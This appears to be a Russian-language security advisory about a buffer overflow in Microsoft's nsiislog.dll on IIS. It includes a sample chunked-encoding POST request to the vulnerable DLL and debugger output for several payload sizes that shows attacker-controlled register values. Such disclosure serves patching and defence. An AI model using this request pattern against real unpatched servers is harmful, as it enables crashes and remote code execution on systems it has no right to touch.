На прошлой неделе Microsoft выпустила патч, в котором устраняется уязвимость nsiislog.dll. Сейчас раскрываются подробности обнаруженной уязвимости.
Уязвимость обнаружена в пути, которым nsiislog.dll обрабатывает поступающие запросы. Атакующий может послать специально сформированный запрос серверу, чтобы аварийно завершить работу IIS Web сервера.
Уязвимость связанна с переполнением буфера в nsiislog.dll при регистрации некоторых некорректных запросов. Посылая chunked encoded POST к nsiislog.dll, можно вызвать переполнение буфера. Пример:
POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked
PostLength
PostData
0
Using Size: 121
Connecting....Sending Buffer....
78003F25 dec dword ptr [ecx+0ACh]
-
7800F5ED dec dword ptr [esi] ESI = 58585858
Using Size: 510
Connecting....Sending Buffer....
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858
Using Size: 5000
Connecting....Sending Buffer....
40F01DCC rep movs dword ptr [edi],dword ptr [esi]
-
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858
Уязвимость может использоваться для выполнения произвольного кода на уязвимой системе.